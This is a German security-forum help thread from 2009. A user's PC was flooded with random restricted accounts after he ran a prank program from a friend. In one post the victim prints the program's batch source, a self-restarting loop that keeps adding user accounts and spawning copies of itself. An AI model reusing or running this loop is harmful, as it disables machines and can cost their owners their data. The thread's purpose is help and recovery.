Zurück   Trojaner-Board > Web/PC > Alles rund um Windows

Alles rund um Windows: Extrem viele Benutzerkonten, finde mein Admin-Konto nicht!

Windows 7 Hilfe zu allen Windows-Betriebssystemen: Windows XP, Windows Vista, Windows 7, Windows 8(.1) und Windows 10 / Windows 11- als auch zu sämtlicher Windows-Software. Alles zu Windows 10 ist auch gerne willkommen. Bitte benenne etwaige Fehler oder Bluescreens unter Windows mit dem Wortlaut der Fehlermeldung und Fehlercode. Erste Schritte für Hilfe unter Windows.

Antwort
Alt 29.06.2009, 22:58   #1
DJ-D
 
Extrem viele Benutzerkonten, finde mein Admin-Konto nicht! - Standard

Problem: Extrem viele Benutzerkonten, finde mein Admin-Konto nicht!



Hallo liebe Spezialisten,

ich erklär mal schnell die Situation:

Ein Freund von mir schickte mir ein Programm und sagte, es sei ganz lustig.Ich führte es aus, und es öffneten sich im Hintergrund Tausendfache prozesse.
Wahrscheinlich, sollte einfach mein PC abkacken! Ich habe ihn dann einfach am Knopf, wie man so schön sagte: "hart" ausgemacht.
Als ich ihn neustartete, waren dort lauter Benutzerkonten mit eingeschränkten Rechten, die verschiedene Ziffern hatten. zB: "8933", "393", "3989834".

Da mein Laptop nicht gerade der Beste ist, hängt er sehr stark. Wenn ich einmal nach unten scrolle bei den ganzen Konten, dann dauert es (ohne gelogen) 5 Minuten, bis eine Reaktion kommt.

Mit Mühe konnte ich mich jetzt bei nem eingeschränkten einloggen...

Nun meine Frage: Bei meinem Admin-Konto sind sehr wichtige Daten, die ich UNBEDINGT BRAUCHE! (Unwiederruflich wichtig). Ich möchte also nicht neu aufsetzen! Gibt es eine Möglichkeit, ein Benuterkonto vom Benutzerkonto aus zu einem Admin-Konto zu machen? Dann könnte ich sehen, was mein Admin konto ist, und die anderen löschen!

Vielleicht hat einer ne Idee,
ich sage jetzt schonmal Danke!
__________________
MfG. Daniel


Ein Keygen kommt selten allein....

Alt 29.06.2009, 23:34   #2
MightyMarc
 
Extrem viele Benutzerkonten, finde mein Admin-Konto nicht! - Standard

Extrem viele Benutzerkonten, finde mein Admin-Konto nicht! Anleitung / Hilfe



Im Normalfall net user aber das wird vllt nix (hab grad keine Lust in den Useraccount zu wechseln).
Ansonsten boote in den abgesicherten Modus und versuche es von dort aus.

Marc

PS: dem Kollegen würde ich eine zünden (zumindest verbal)
__________________

__________________

Alt 30.06.2009, 00:16   #3
DJ-D
 
Extrem viele Benutzerkonten, finde mein Admin-Konto nicht! - Standard

Extrem viele Benutzerkonten, finde mein Admin-Konto nicht! Details



Okay... Ich bericht dann, obs geklappt hat.


Ich hab ihm schon eine gezündet...
__________________
__________________

Alt 30.06.2009, 00:30   #4
Kaos
 
Extrem viele Benutzerkonten, finde mein Admin-Konto nicht! - Standard

Lösung: Extrem viele Benutzerkonten, finde mein Admin-Konto nicht!



Ansonsten beim Anmeldebildschirm STRG+ALT+ENTF drücken (ca. 1sek). Dann sollte die klassische Anmeldung auftauchen.

Dort Username und Passwort eingeben.

mfg, Kaos

Alt 30.06.2009, 12:44   #5
DJ-D
 
Extrem viele Benutzerkonten, finde mein Admin-Konto nicht! - Standard

Wie Extrem viele Benutzerkonten, finde mein Admin-Konto nicht!



Das mit dem Abgesicherten Modus hat nicht geklappt...

Ich habe aber den Programmcode!

Code:
ATTFilter
@echo off
echo Muhahahaha!
:add
net user %random% /add
start acf.bat
goto add
         
eine BATCH (.bat) Datei! Sie wurde zu ner .exe komplimiert (sagte mein Kollege), und lief versteckt nach dem öffnen der .exe im Hintergrund!

Was soll ich jetzt tun? Das, was Kaos sagte?

__________________
MfG. Daniel


Ein Keygen kommt selten allein....

Alt 30.06.2009, 13:03   #6
DJ-D
 
Extrem viele Benutzerkonten, finde mein Admin-Konto nicht! - Standard

Wo Extrem viele Benutzerkonten, finde mein Admin-Konto nicht! Lösung!



Zur verdeutlicherung: Im Abgesichterten Modus war ich dort, wo man sich normal das Admin-Konto auswählt. Nur ist dort keins! (überhaupt kein Konto)
__________________
--> Extrem viele Benutzerkonten, finde mein Admin-Konto nicht!

Alt 30.06.2009, 13:50   #7
DJ-D
 
Extrem viele Benutzerkonten, finde mein Admin-Konto nicht! - Standard

Extrem viele Benutzerkonten, finde mein Admin-Konto nicht!



Es gibt kein Adminkonto mehr auf meinem Rechner, wie ist das möglich?
__________________
MfG. Daniel


Ein Keygen kommt selten allein....

Alt 30.06.2009, 13:55   #8
Kaos
 
Extrem viele Benutzerkonten, finde mein Admin-Konto nicht! - Standard

Extrem viele Benutzerkonten, finde mein Admin-Konto nicht!



Es gibt weder dein altes Konto noch ein AdministratorKonto?

Also beim Anmelden Administrator eingeben und dann das Passwort oder dein eigentliches Konto + Passwort?

mfg, Kaos

Alt 30.06.2009, 15:12   #9
MightyMarc
 
Extrem viele Benutzerkonten, finde mein Admin-Konto nicht! - Standard

Extrem viele Benutzerkonten, finde mein Admin-Konto nicht!



Code:
ATTFilter
net user
         
Scheint ja bestens bei Dir zu funktionieren.

Marc
__________________
When you contact tech support, a lot of people feel like they're either talking to an idiot or being treated like one.

Alt 30.06.2009, 20:14   #10
DJ-D
 
Extrem viele Benutzerkonten, finde mein Admin-Konto nicht! - Standard

Extrem viele Benutzerkonten, finde mein Admin-Konto nicht! [gelöst]



Hab letztenendes doch formatiert!

Also, eine .exe Datei, die 23 KB groß ist nie ausführen, wenn man sich nicht sicher ist...
Formatieren war der einzige Ausweg.
Der vom Mediamarkt erklärte mal, dass es zu viel Datenmenge ist, und der PC dann das Adminkonto löscht oder so...
__________________
MfG. Daniel


Ein Keygen kommt selten allein....

Alt 30.06.2009, 22:38   #11
MightyMarc
 
Extrem viele Benutzerkonten, finde mein Admin-Konto nicht! - Standard

Extrem viele Benutzerkonten, finde mein Admin-Konto nicht! [gelöst]



Zitat:
Zitat von DJ-D Beitrag anzeigen
Der vom Mediamarkt ...
Guter Anfang!

Marc
__________________
When you contact tech support, a lot of people feel like they're either talking to an idiot or being treated like one.

Antwort

Themen zu Extrem viele Benutzerkonten, finde mein Admin-Konto nicht!
5 minuten, anderen, aufsetzen, benutzerkonten, benutzerkonto, beste, brauche, daten, einfach, frage, freund, hintergrund, hängt, laptop, löschen, minuten, neu aufsetzen, programm, reaktion, rechte, schnell, schonmal, situation, spezialisten, unbedingt, verschiedene, wichtige, wichtige daten



Ähnliche Themen: Extrem viele Benutzerkonten, finde mein Admin-Konto nicht!


  1. Win7: Trojan.VBS.Autorun.ADK wurde von Antivir nicht erkannt. Oeffnet viele Kommandozeilenfenster mit Admin-Zugriffsanfrage
    Log-Analyse und Auswertung - 25.05.2015 (25)
  2. Mozilla Google chrome funktioniert nicht, viele Fenster ploppen auf, mein Antivir ist ziemlich beschäftigt
    Plagegeister aller Art und deren Bekämpfung - 18.09.2014 (33)
  3. Admin-Konto funktioniert nicht mehr
    Log-Analyse und Auswertung - 30.12.2013 (11)
  4. GVU Trojaner / windows7 / admin-konto funktioniert nicht mehr
    Log-Analyse und Auswertung - 01.08.2013 (15)
  5. GVU Trojaner auf nicht-admin Konto, Win7
    Plagegeister aller Art und deren Bekämpfung - 28.04.2013 (10)
  6. Polizei - Trojaner blockiert mein Admin-Konto..
    Plagegeister aller Art und deren Bekämpfung - 13.07.2012 (6)
  7. Unterschied: Win7 Admin Konto und Benutzerkonto
    Alles rund um Windows - 26.02.2012 (2)
  8. Wenn ich surfe, erhalten viele andere Personen eine Mail, finde aber über malvare usw. keinen Trojan
    Log-Analyse und Auswertung - 06.12.2011 (18)
  9. Unbekanntes Konto als Admin
    Mülltonne - 25.09.2011 (3)
  10. Admin Konto hat keine Admin Rechte mehr
    Log-Analyse und Auswertung - 08.08.2011 (1)
  11. Mein Hotmail Konto verschickt automatisch Spam-Mails an mein Adressbuch =/
    Plagegeister aller Art und deren Bekämpfung - 16.02.2011 (7)
  12. Systemreinigung div. Benutzerkonten Multiuserbetrieb eingeschränkte Benutzerkonten
    Diskussionsforum - 06.01.2011 (2)
  13. In Windows xp ca. 50 neue Benutzeraccounts und nicht das admin konto.
    Plagegeister aller Art und deren Bekämpfung - 03.11.2010 (2)
  14. Admin Konto startet nicht mehr
    Log-Analyse und Auswertung - 24.09.2008 (4)
  15. Thunderbird vom Admin-Konto zum Gast-Konto "verschieben"
    Alles rund um Windows - 23.01.2008 (2)
  16. Probleme mit Admin Konto beim XP neu aufsetzen
    Alles rund um Windows - 16.12.2005 (2)
  17. feste ie sicherheitseinstellungen bei admin konto?
    Alles rund um Windows - 18.03.2005 (2)

Zum Thema Extrem viele Benutzerkonten, finde mein Admin-Konto nicht! - Hallo liebe Spezialisten, ich erklär mal schnell die Situation: Ein Freund von mir schickte mir ein Programm und sagte, es sei ganz lustig.Ich führte es aus, und es öffneten sich - Extrem viele Benutzerkonten, finde mein Admin-Konto nicht!...
Archiv
Du betrachtest: Extrem viele Benutzerkonten, finde mein Admin-Konto nicht! auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.